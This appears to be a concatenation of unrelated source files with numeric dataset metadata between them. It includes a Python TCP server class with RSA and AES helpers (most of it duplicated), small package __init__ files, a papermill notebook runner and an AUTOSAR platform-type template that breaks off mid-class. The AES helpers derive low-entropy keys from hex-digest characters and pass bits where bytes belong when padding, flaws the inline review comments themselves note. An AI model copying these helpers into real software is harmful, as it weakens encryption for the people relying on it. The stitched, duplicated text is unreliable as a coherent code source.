        verifier = PKCS115_SigScheme(pub_key)
        try:
            verifier.verify(digest, signature)
            status = True
        except (ValueError, TypeError):
            # PKCS115_SigScheme.verify signals an invalid signature by
            # raising ValueError; anything else should propagate.
            status = False
        return status

    def rsa_import_key(self, key_file: str) -> RSA.RsaKey:
        """Import RSA key from a given key file

        Args:
            key_file (str): Path to RSA key file

        Raises:
            FileNotFoundError: If file does not exist

        Returns:
            RSA.RsaKey: RSA key pair
        """
        key_file_obj = Path(key_file).resolve()
        if not key_file_obj.exists():
            raise FileNotFoundError(f'File does not exist: {str(key_file_obj)}')
        with key_file_obj.open('r') as f:
            key = RSA.import_key(f.read())
        return key

    def rsa_export_key(self, key_file: str, key: RSA.RsaKey) -> None:
        """Export RSA key to file (parent directories are created as needed)

        Args:
            key_file (str): Path to RSA key file
            key (RSA.RsaKey): RSA key to export
        """
        key_file_obj = Path(key_file).resolve()
        key_file_obj.parent.mkdir(parents=True, exist_ok=True)
        with key_file_obj.open('wb') as f:
            f.write(key.export_key())

    def aes_generate_iv(self) -> bytes:
        """Generates random 16 bytes initialization vector (IV)

        Returns:
            bytes: Initialization vector
        """
        iv = token_bytes(16)
        return iv

    def aes_generate_key(self, seed: str, block_size=256) -> bytes:
        """Generates AES key from a given seed with default block size of 256 bits.
        Key size is being determined by the 'block_size' variable.

        Args:
            seed (str): String to generate a key from
            block_size (int, optional): Key size in bits (128, 192 or 256). Defaults to 256.

        Raises:
            ValueError: If block size is not valid

        Returns:
            bytes: AES key with size 'block_size'
        """
        valid_sizes = [128, 192, 256]
        if block_size not in valid_sizes:
            raise ValueError(f'Block size is not valid: {block_size}')
        # NOTE(review): the key is built from hex-digest characters, i.e.
        # each key byte carries only 4 bits of entropy — consider using the
        # raw digest bytes instead.
        key = sha512(seed.encode('utf-8')).hexdigest()[:(block_size//8)]
        key = key.encode('utf-8')
        return key

    def aes_encrypt_message(self, message: str, key: bytes, iv: bytes, block_size=256) -> bytes:
        """Encrypts the given message using AES in CBC mode and the given key and IV.

        Args:
            message (str): Message to encrypt
            key (bytes): AES key
            iv (bytes): 16 bytes initialization vector
            block_size (int, optional): Block size in bits (128, 192 or 256). Defaults to 256.

        Raises:
            ValueError: If block size is not valid
            ValueError: If IV is not 16 bytes

        Returns:
            bytes: Base64 of IV + ciphertext
        """
        valid_sizes = [128, 192, 256]
        if block_size not in valid_sizes:
            raise ValueError(f'Block size is not valid: {block_size}')
        elif len(iv) != 16:
            raise ValueError(f'Invalid IV size: {len(iv)}bytes')
        msg = message.encode('utf-8')
        # NOTE(review): Crypto.Util.Padding.pad expects a block size in
        # BYTES (AES uses 16), but receives `block_size` in bits — this
        # over-pads to a 256-byte boundary and breaks when the plaintext
        # length is an exact multiple of 256. Left unchanged so the wire
        # format stays compatible with existing peers; should likely be
        # pad(msg, AES.block_size) on both encrypt and decrypt sides.
        padded_message = pad(msg, block_size)
        encryptor = AES.new(key, AES.MODE_CBC, iv)
        encrypted = encryptor.encrypt(padded_message)
        # Prepend the IV so the receiver can decrypt without prior exchange.
        enc_message = b64encode(iv + encrypted)
        return enc_message

    def aes_decrypt_message(self, enc_message: bytes, key: bytes, block_size=256) -> str:
        """Decrypts the given message using AES in CBC mode and the given key and IV.

        Args:
            enc_message (bytes): Message to decrypt (base64 of IV + ciphertext)
            key (bytes): AES key
            block_size (int, optional): Block size in bits (128, 192 or 256). Defaults to 256.

        Raises:
            ValueError: If block size is not valid

        Returns:
            str: Decrypted message
        """
        valid_sizes = [128, 192, 256]
        if block_size not in valid_sizes:
            raise ValueError(f'Block size is not valid: {block_size}')
        _enc_message = b64decode(enc_message)
        # First 16 bytes are the IV prepended by aes_encrypt_message.
        iv = _enc_message[:16]
        decryptor = AES.new(key, AES.MODE_CBC, iv)
        decrypted = decryptor.decrypt(_enc_message[16:])
        # NOTE(review): mirrors the bits/bytes confusion in
        # aes_encrypt_message — see note there.
        message = unpad(decrypted, block_size)
        message = message.decode('utf-8')
        return message
class Server(metaclass=ABCMeta):
    """Abstract single-connection TCP server with RSA/AES crypto helpers.

    Subclasses must implement ``do_handshake``, which is invoked right
    after a client connects; the connection is kept only if the handshake
    reports success.
    """

    def __init__(self, host='127.0.0.1', port=1234) -> None:
        """Instantiate a server object

        Args:
            host (str, optional): IP or URL address of the server. Defaults to '127.0.0.1'.
            port (int, optional): Port the server will listen to. Defaults to 1234.
        """
        self.__host = host
        self.__port = port
        # Set by wait_for_connection once a client is accepted.
        self.__conn = None

    @property
    def host(self) -> str:
        """Return the servers address (ip or url)

        Returns:
            str: IP address or URL address
        """
        return self.__host

    @property
    def port(self) -> int:
        """Returns the port the server listens to

        Returns:
            int: Port number
        """
        return self.__port

    @property
    def conn(self) -> socket:
        """Returns the socket representing the connection with the client

        Returns:
            socket: Connection with the client, or None if not connected
        """
        return self.__conn

    def wait_for_connection(self) -> bool:
        """Blocking method - Waiting for a connection from a client

        Returns:
            bool: 'True' if handshake established successfully and 'False' if not
        """
        # The listening socket lives only for this `with` block; the
        # accepted per-client socket is kept on self.__conn.
        with socket(AF_INET, SOCK_STREAM) as s:
            s.bind((self.__host, self.__port))
            s.listen()
            conn, addr = s.accept()
            self.__conn = conn
            print(f'Connected by: {addr}')
            result = self.do_handshake()
            if result == True:
                return True
            else:
                # Handshake failed: forget the client socket.
                # NOTE(review): the accepted socket is not closed here —
                # confirm whether it should be.
                self.__conn = None
                return False

    def send_message(self, message: str) -> None:
        """Send a message to the client

        Args:
            message (str): Message to send to client
        """
        # NOTE(review): socket.send may transmit fewer bytes than given;
        # sendall would guarantee full delivery — confirm intent.
        self.__conn.send(message.encode('utf-8'))

    def recieve_message(self) -> str:
        """Receive a message from the client

        Returns:
            str: Message received from the client (at most 1024 bytes read)
        """
        message = self.__conn.recv(1024).decode('utf-8')
        return message

    @abstractmethod
    def do_handshake(self) -> bool:
        """Hook function - Handshake before establishing a connection

        Returns:
            bool: 'True' if connection established successfully and 'False' if not
        """
        # Default: no handshake.
        return True

    def generate_rsa_keys(self, size=2048) -> RSA.RsaKey:
        """Generates RSA keys with a given size

        Args:
            size (int, optional): Size of keys in bits. Defaults to 2048.
                Valid sizes: 1024, 2048, 3072, 4096, 6144, 8192 bits

        Raises:
            ValueError: If given size is not supported

        Returns:
            RSA.RsaKey: Pair of RSA private and public keys
        """
        valid_sizes = [1024, 2048, 3072, 4096, 6144, 8192]
        if size not in valid_sizes:
            raise ValueError(f'Key size is not valid: {size}')
        key_pair = RSA.generate(size)
        return key_pair

    def rsa_encrypt_message(self, message: str, pub_key: RSA.RsaKey) -> bytes:
        """Encrypts the given message using RSA (PKCS#1 OAEP)

        Args:
            message (str): Message to encrypt
            pub_key (RSA.RsaKey): Public RSA key

        Returns:
            bytes: Encrypted message
        """
        # convert string to bytes
        msg = message.encode('utf-8')
        # encrypt message
        encryptor = PKCS1_OAEP.new(pub_key)
        encrypted = encryptor.encrypt(msg)
        return encrypted

    def rsa_decrypt_message(self, enc_message: bytes, key_pair: RSA.RsaKey) -> str:
        """Decrypts the given message using RSA (PKCS#1 OAEP)

        Args:
            enc_message (bytes): Encrypted message
            key_pair (RSA.RsaKey): RSA key pair of private and public keys

        Returns:
            str: Decrypted message
        """
        # decrypt message
        decryptor = PKCS1_OAEP.new(key_pair)
        decrypted = decryptor.decrypt(enc_message)
        # convert bytes to string
        message = decrypted.decode('utf-8')
        return message

    def rsa_sign_message(self, message: bytes, key_pair: RSA.RsaKey) -> bytes:
        """Sign a given message using PKCS#1 standard version 1.5

        Args:
            message (bytes): Message to sign
            key_pair (RSA.RsaKey): RSA key pair of private and public keys

        Returns:
            bytes: Signature over the SHA-512 digest of the message
        """
        digest = sha512(message)
        signer = PKCS115_SigScheme(key_pair)
        signature = signer.sign(digest)
        return signature

    def rsa_verify_signature(self, message: bytes, signature: bytes, pub_key: RSA.RsaKey) -> bool:
        """Verify message signature using PKCS#1 standard version 1.5

        Args:
            message (bytes): Message to compare
            signature (bytes): Signature to verify
            pub_key (RSA.RsaKey): Public RSA key

        Returns:
            bool: 'True' if signature is valid and 'False' if not
        """
        digest = sha512(message)
        verifier = PKCS115_SigScheme(pub_key)
        try:
            verifier.verify(digest, signature)
            status = True
        except (ValueError, TypeError):
            # PKCS115_SigScheme.verify signals an invalid signature by
            # raising ValueError; anything else should propagate.
            status = False
        return status

    def rsa_import_key(self, key_file: str) -> RSA.RsaKey:
        """Import RSA key from a given key file

        Args:
            key_file (str): Path to RSA key file

        Raises:
            FileNotFoundError: If file does not exist

        Returns:
            RSA.RsaKey: RSA key pair
        """
        key_file_obj = Path(key_file).resolve()
        if not key_file_obj.exists():
            raise FileNotFoundError(f'File does not exist: {str(key_file_obj)}')
        with key_file_obj.open('r') as f:
            key = RSA.import_key(f.read())
        return key

    def rsa_export_key(self, key_file: str, key: RSA.RsaKey) -> None:
        """Export RSA key to file (parent directories are created as needed)

        Args:
            key_file (str): Path to RSA key file
            key (RSA.RsaKey): RSA key to export
        """
        key_file_obj = Path(key_file).resolve()
        key_file_obj.parent.mkdir(parents=True, exist_ok=True)
        with key_file_obj.open('wb') as f:
            f.write(key.export_key())

    def aes_generate_iv(self) -> bytes:
        """Generates random 16 bytes initialization vector (IV)

        Returns:
            bytes: Initialization vector
        """
        iv = token_bytes(16)
        return iv

    def aes_generate_key(self, seed: str, block_size=256) -> bytes:
        """Generates AES key from a given seed with default block size of 256 bits.
        Key size is being determined by the 'block_size' variable.

        Args:
            seed (str): String to generate a key from
            block_size (int, optional): Key size in bits (128, 192 or 256). Defaults to 256.

        Raises:
            ValueError: If block size is not valid

        Returns:
            bytes: AES key with size 'block_size'
        """
        valid_sizes = [128, 192, 256]
        if block_size not in valid_sizes:
            raise ValueError(f'Block size is not valid: {block_size}')
        # NOTE(review): the key is built from hex-digest characters, i.e.
        # each key byte carries only 4 bits of entropy — consider using the
        # raw digest bytes instead.
        key = sha512(seed.encode('utf-8')).hexdigest()[:(block_size//8)]
        key = key.encode('utf-8')
        return key

    def aes_encrypt_message(self, message: str, key: bytes, iv: bytes, block_size=256) -> bytes:
        """Encrypts the given message using AES in CBC mode and the given key and IV.

        Args:
            message (str): Message to encrypt
            key (bytes): AES key
            iv (bytes): 16 bytes initialization vector
            block_size (int, optional): Block size in bits (128, 192 or 256). Defaults to 256.

        Raises:
            ValueError: If block size is not valid
            ValueError: If IV is not 16 bytes

        Returns:
            bytes: Base64 of IV + ciphertext
        """
        valid_sizes = [128, 192, 256]
        if block_size not in valid_sizes:
            raise ValueError(f'Block size is not valid: {block_size}')
        elif len(iv) != 16:
            raise ValueError(f'Invalid IV size: {len(iv)}bytes')
        msg = message.encode('utf-8')
        # NOTE(review): Crypto.Util.Padding.pad expects a block size in
        # BYTES (AES uses 16), but receives `block_size` in bits — this
        # over-pads to a 256-byte boundary and breaks when the plaintext
        # length is an exact multiple of 256. Left unchanged so the wire
        # format stays compatible with existing peers; should likely be
        # pad(msg, AES.block_size) on both encrypt and decrypt sides.
        padded_message = pad(msg, block_size)
        encryptor = AES.new(key, AES.MODE_CBC, iv)
        encrypted = encryptor.encrypt(padded_message)
        # Prepend the IV so the receiver can decrypt without prior exchange.
        enc_message = b64encode(iv + encrypted)
        return enc_message

    def aes_decrypt_message(self, enc_message: bytes, key: bytes, block_size=256) -> str:
        """Decrypts the given message using AES in CBC mode and the given key and IV.

        Args:
            enc_message (bytes): Message to decrypt (base64 of IV + ciphertext)
            key (bytes): AES key
            block_size (int, optional): Block size in bits (128, 192 or 256). Defaults to 256.

        Raises:
            ValueError: If block size is not valid

        Returns:
            str: Decrypted message
        """
        valid_sizes = [128, 192, 256]
        if block_size not in valid_sizes:
            raise ValueError(f'Block size is not valid: {block_size}')
        _enc_message = b64decode(enc_message)
        # First 16 bytes are the IV prepended by aes_encrypt_message.
        iv = _enc_message[:16]
        decryptor = AES.new(key, AES.MODE_CBC, iv)
        decrypted = decryptor.decrypt(_enc_message[16:])
        # NOTE(review): mirrors the bits/bytes confusion in
        # aes_encrypt_message — see note there.
        message = unpad(decrypted, block_size)
        message = message.decode('utf-8')
        return message
| 31.489327
| 96
| 0.585597
| 2,385
| 19,177
| 4.589518
| 0.091405
| 0.042755
| 0.013155
| 0.017906
| 0.91586
| 0.896583
| 0.893751
| 0.888452
| 0.884433
| 0.884433
| 0
| 0.033437
| 0.327841
| 19,177
| 608
| 97
| 31.541118
| 0.815749
| 0.383167
| 0
| 0.862222
| 0
| 0
| 0.055194
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.168889
| false
| 0
| 0.062222
| 0
| 0.391111
| 0.004444
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
65109d14f490c866e5ef11809f59491d1d0a5d2c
| 157
|
py
|
Python
|
scratchai/nets/clf/__init__.py
|
y0un35/scratchai
|
f534bdd13ce0efd26d1e3ab423a98f0b2cdcd938
|
[
"MIT"
] | 2
|
2019-07-15T16:26:31.000Z
|
2020-05-26T09:40:30.000Z
|
scratchai/nets/clf/__init__.py
|
y0un35/scratchai
|
f534bdd13ce0efd26d1e3ab423a98f0b2cdcd938
|
[
"MIT"
] | null | null | null |
scratchai/nets/clf/__init__.py
|
y0un35/scratchai
|
f534bdd13ce0efd26d1e3ab423a98f0b2cdcd938
|
[
"MIT"
] | null | null | null |
from scratchai.nets.clf.lenet import *
from scratchai.nets.clf.alexnet import *
from scratchai.nets.clf.resnet import *
from scratchai.nets.clf.vgg import *
| 31.4
| 40
| 0.796178
| 24
| 157
| 5.208333
| 0.375
| 0.416
| 0.544
| 0.64
| 0.624
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101911
| 157
| 4
| 41
| 39.25
| 0.886525
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
6511e0861e3d5b0d8a6476dd48a9579b01a54854
| 493
|
py
|
Python
|
notebook_tester.py
|
jessmuir/DESI-HighSchool
|
b96e505f72d7f61492fd2faeca0d4ba389a463ef
|
[
"BSD-3-Clause"
] | null | null | null |
notebook_tester.py
|
jessmuir/DESI-HighSchool
|
b96e505f72d7f61492fd2faeca0d4ba389a463ef
|
[
"BSD-3-Clause"
] | null | null | null |
notebook_tester.py
|
jessmuir/DESI-HighSchool
|
b96e505f72d7f61492fd2faeca0d4ba389a463ef
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import papermill as pm
# Execute each lesson notebook headlessly via papermill, in order, to
# verify it runs end-to-end with the given parameters.
# NOTE(review): every run writes to the same output path, so only the
# last notebook's executed copy survives — confirm this is intended.
NOTEBOOK_NAMES = ['Intro', 'DESI', 'DesigningDESI', 'SnowWhiteDwarf']

for notebook_name in NOTEBOOK_NAMES:
    pm.execute_notebook(
        f'./{notebook_name}.ipynb',
        './pmout/pmout.ipynb',
        parameters=dict(alpha=0.6, ratio=0.1)
    )
| 18.259259
| 40
| 0.663286
| 70
| 493
| 4.614286
| 0.285714
| 0.111455
| 0.210526
| 0.247678
| 0.752322
| 0.752322
| 0.752322
| 0.752322
| 0.752322
| 0.752322
| 0
| 0.037825
| 0.141988
| 493
| 26
| 41
| 18.961538
| 0.725768
| 0
| 0
| 0.545455
| 0
| 0
| 0.292089
| 0.087221
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.090909
| 0
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3306ddf46d862c7a67e0d6c49cb61d4747afae81
| 176
|
py
|
Python
|
plugins/broadcom_symantec_endpoint_protection/icon_broadcom_symantec_endpoint_protection/actions/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 46
|
2019-06-05T20:47:58.000Z
|
2022-03-29T10:18:01.000Z
|
plugins/broadcom_symantec_endpoint_protection/icon_broadcom_symantec_endpoint_protection/actions/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 386
|
2019-06-07T20:20:39.000Z
|
2022-03-30T17:35:01.000Z
|
plugins/broadcom_symantec_endpoint_protection/icon_broadcom_symantec_endpoint_protection/actions/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 43
|
2019-07-09T14:13:58.000Z
|
2022-03-28T12:04:46.000Z
|
# GENERATED BY KOMAND SDK - DO NOT EDIT
from .blacklist.action import Blacklist
from .get_agent_details.action import GetAgentDetails
from .quarantine.action import Quarantine
| 35.2
| 53
| 0.835227
| 24
| 176
| 6.041667
| 0.666667
| 0.248276
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119318
| 176
| 4
| 54
| 44
| 0.935484
| 0.210227
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
333fe37decd0ba8919969dc7a9f6329fe28062d8
| 19,753
|
py
|
Python
|
examples/autosar4/template/packages/platform.py
|
SHolzmann/autosar
|
26a7725ef71f63323ba5daa8d8bd841449da1da4
|
[
"MIT"
] | 199
|
2016-07-27T17:14:43.000Z
|
2022-03-30T12:28:02.000Z
|
examples/autosar4/template/packages/platform.py
|
SHolzmann/autosar
|
26a7725ef71f63323ba5daa8d8bd841449da1da4
|
[
"MIT"
] | 50
|
2017-10-10T08:19:21.000Z
|
2022-03-27T18:43:29.000Z
|
examples/autosar4/template/packages/platform.py
|
SHolzmann/autosar
|
26a7725ef71f63323ba5daa8d8bd841449da1da4
|
[
"MIT"
] | 125
|
2016-07-27T17:16:08.000Z
|
2022-03-30T17:03:28.000Z
|
#!/usr/bin/env python3
import autosar
# Toggle generation of the 64-bit platform types (sint64/uint64); the
# `all` template checks this flag before applying them.
enable_64_bit_types = True
class AUTOSAR_Platform(autosar.Template):
"""AUTOSAR Platform Package"""
@classmethod
def ref(cls): return '/AUTOSAR_Platform'
@classmethod
def apply(cls, ws):
package = ws.find('/AUTOSAR_Platform')
if package is None:
package = ws.createPackage('AUTOSAR_Platform')
package.createSubPackage('BaseTypes')
package.createSubPackage('CompuMethods')
package.createSubPackage('DataConstrs')
package.createSubPackage('ImplementationDataTypes')
class all(autosar.Template):
"""
Applies all known platform templates at once
"""
@classmethod
def apply(self, ws):
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.dtRef_const_VOID)
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.dtRef_VOID)
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.boolean)
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.float32)
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.float64)
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.sint8)
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.sint16)
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.sint32)
if enable_64_bit_types:
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.sint64)
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.uint8)
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.uint16)
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.uint32)
if enable_64_bit_types:
ws.apply(AUTOSAR_Platform.ImplementationDataTypes.uint64)
# ws.apply(AUTOSAR_Platform.BaseTypes.boolean)
# ws.apply(AUTOSAR_Platform.BaseTypes.dtRef_const_VOID)
# ws.apply(AUTOSAR_Platform.BaseTypes.dtRef_VOID)
# ws.apply(AUTOSAR_Platform.BaseTypes.sint16)
# ws.apply(AUTOSAR_Platform.BaseTypes.sint8)
# ws.apply(AUTOSAR_Platform.BaseTypes.uint8)
# ws.apply(AUTOSAR_Platform.BaseTypes.uint16)
# ws.apply(AUTOSAR_Platform.BaseTypes.uint32)
# ws.apply(AUTOSAR_Platform.BaseTypes.float32)
# ws.apply(AUTOSAR_Platform.BaseTypes.float64)
# ws.apply(AUTOSAR_Platform.ImplementationDataTypes.boolean)
# ws.apply(AUTOSAR_Platform.ImplementationDataTypes.sint16)
# ws.apply(AUTOSAR_Platform.ImplementationDataTypes.sint8)
# ws.apply(AUTOSAR_Platform.ImplementationDataTypes.uint16)
# ws.apply(AUTOSAR_Platform.ImplementationDataTypes.uint32)
# ws.apply(AUTOSAR_Platform.ImplementationDataTypes.float32)
class BaseTypes:
@classmethod
def ref(cls): return '/AUTOSAR_Platform/BaseTypes'
class dtRef_const_VOID(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 1, encoding = 'VOID', nativeDeclaration = 'void')
class dtRef_VOID(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 1, encoding = 'VOID', nativeDeclaration = 'void')
class boolean(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 8, encoding = 'BOOLEAN', nativeDeclaration='boolean')
class float32(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 32, encoding = 'IEEE754', nativeDeclaration = cls.__name__)
class float64(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 64, encoding = 'IEEE754', nativeDeclaration = cls.__name__)
class sint8(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 8, encoding = '2C', nativeDeclaration = cls.__name__)
class sint16(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 16, encoding = '2C', nativeDeclaration = cls.__name__)
class sint32(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 32, encoding = '2C', nativeDeclaration = cls.__name__)
class sint64(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 64, encoding = '2C', nativeDeclaration = cls.__name__)
class uint8(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 8, nativeDeclaration = cls.__name__)
class uint16(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 16, nativeDeclaration = cls.__name__)
class uint32(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 32, nativeDeclaration = cls.__name__)
class uint64(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.BaseTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform)
package = ws.find(AUTOSAR_Platform.BaseTypes.ref())
if package.find(cls.__name__) is None:
package.createSwBaseType(cls.__name__, 64, nativeDeclaration = cls.__name__)
class ImplementationDataTypes:
@classmethod
def ref(cls): return '/AUTOSAR_Platform/ImplementationDataTypes'
class dtRef_const_VOID(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.ImplementationDataTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform.BaseTypes.dtRef_const_VOID)
package = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
if package.find(cls.__name__) is None:
package.createImplementationDataTypePtr(cls.__name__, AUTOSAR_Platform.BaseTypes.dtRef_const_VOID.ref(), swImplPolicy = 'CONST')
class dtRef_VOID(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.ImplementationDataTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform.BaseTypes.dtRef_VOID)
package = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
if package.find(cls.__name__) is None:
package.createImplementationDataTypePtr(cls.__name__, AUTOSAR_Platform.BaseTypes.dtRef_VOID.ref())
class boolean(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.ImplementationDataTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform.BaseTypes.boolean)
package = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
if package.find(cls.__name__) is None:
ws.pushRoles()
ws.setRoles(('/AUTOSAR_Platform/CompuMethods', 'CompuMethod'), ('/AUTOSAR_Platform/DataConstrs', 'DataConstraint'))
package.createImplementationDataType(cls.__name__, AUTOSAR_Platform.BaseTypes.boolean.ref(), valueTable=['FALSE', 'TRUE'], typeEmitter='Platform_Type')
ws.popRoles()
class float32(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.ImplementationDataTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform.BaseTypes.float32)
package = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
if package.find(cls.__name__) is None:
ws.pushRoles()
ws.setRoles(('/AUTOSAR_Platform/CompuMethods', 'CompuMethod'), ('/AUTOSAR_Platform/DataConstrs', 'DataConstraint'))
package.createImplementationDataType(cls.__name__, AUTOSAR_Platform.BaseTypes.float32.ref(), lowerLimit="-INF", lowerLimitType="OPEN", upperLimit="INF", upperLimitType="OPEN", typeEmitter='Platform_Type')
ws.popRoles()
class float64(autosar.Template):
@classmethod
def ref(cls): return AUTOSAR_Platform.ImplementationDataTypes.ref() + '/' + cls.__name__
@classmethod
def apply(cls, ws):
ws.apply(AUTOSAR_Platform.BaseTypes.float64)
package = ws.find(AUTOSAR_Platform.ImplementationDataTypes.ref())
if package.find(cls.__name__) is None:
ws.pushRoles()
ws.setRoles(('/AUTOSAR_Platform/CompuMethods', 'CompuMethod'), ('/AUTOSAR_Platform/DataConstrs', 'DataConstraint'))
package.createImplementationDataType(cls.__name__, AUTOSAR_Platform.BaseTypes.float64.ref(), lowerLimit="-INF", lowerLimitType="OPEN", upperLimit="INF", upperLimitType="OPEN", typeEmitter='Platform_Type')
ws.popRoles()
class sint8(autosar.Template):
@classmethod
